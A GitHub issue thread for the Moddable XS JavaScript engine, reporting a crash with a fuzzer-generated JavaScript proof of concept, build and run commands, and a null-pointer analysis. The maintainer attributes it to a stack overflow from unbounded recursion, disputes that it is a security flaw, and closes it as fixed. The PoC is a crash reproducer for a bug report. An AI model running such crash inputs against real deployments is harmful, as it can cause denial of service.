Moddable-OpenSource/moddable #364: Access of Uninitialized Pointer

rain6851, 2020-05-20:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xsc poc
```
# poc:
```
function main() {
    const v2 = [
        13.37,
        13.37,
        13.37,
        13.37,
        13.37
    ];
    JSON.stringify('3f2Kx/?/YBw_p|f8~9/b9h7D');
    const v3 = [];
    v5(null, null, null, null, null);
    let v4 = v3;
    var SGSN = JSON.parse('>F/');
    JSON.parse('');
    main();
    var Fzie = v5(null, null, null, null, null);
    function v5(v6, v7) {
        let v10 = 0;
        v5(null, null, null, null, null);
        var KKJH = new ArrayBuffer(null);
        v5(null, null, null, null, null);
        v31.length = main();
        while (v10 < 10) {
            const v17 = [1337];
            var mxbW = JSON.parse('C!qTIPNw]b`T;!?(BN');
            const v18 = [v17];
            const v19 = {
                c: -2589926580,
                __proto__: v18,
                a: -2589926580
            };
            main();
            JSON.parse('MhxyK%jBYg|w7(+9>{hWv');
            JSON.parse('y@.ImN');
            v5(null, null, null, null, null);
            var zXDy = Proxy;
            v5(null, null, null, null, null);
            var NCFK = JSON;
            const v21 = new Set('');
            var NiXR = JSON.parse('{V=`D,M[q<[');
            const v22 = v21.add(v19);
            var fAJf = JSON.parse('');
            var tXrT = v5(null, null, null, null, null);
            var bKTJ = Math;
            var Xkza = v5(null, v4, v17.length, v3.length, v17.length);
            const v23 = v22.clear();
            var ATEH = new String();
            for (let v24 = 0; v24 < 8; v24++) {
                for (let v28 = 0; v28 < 5; v28++) {
                }
            }
            const v29 = v10 + 1;
            v31.length = v29;
        }
    }
    const v30 = [];
    let v31 = v30;
    const v32 = v5(...v31, v4, ...v2, 10, 13.37);
}
main();
```
# vulnerability analysis
```
crash position: /home/node/moddable/xs/tools/xsc.c:397
```
We can see that the value of `eax` is 0, that is, the `dot` is a null pointer. But it is not checked, and it is assigned directly, causing a crash.

[image]

[image]

rain6851, 2020-05-21:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-05-22:
This looks to be a stack overflow because `v5` recurses indefinitely. XS correctly detects the overflow. Before a debug build of the host app exits, it tries to stop in the debugger. In some cases, that crashes. However, XS does seem to be doing the right thing in stopping when it detects the stack overflow. We'll look into that as it shouldn't crash, but if the analysis is correct this is not a security vulnerability.

Here's the stack trace on macOS for reference:

[image]

phoddie, 2020-08-04:
Fixed. Similar to #376.

closed 2020-08-04 by phoddie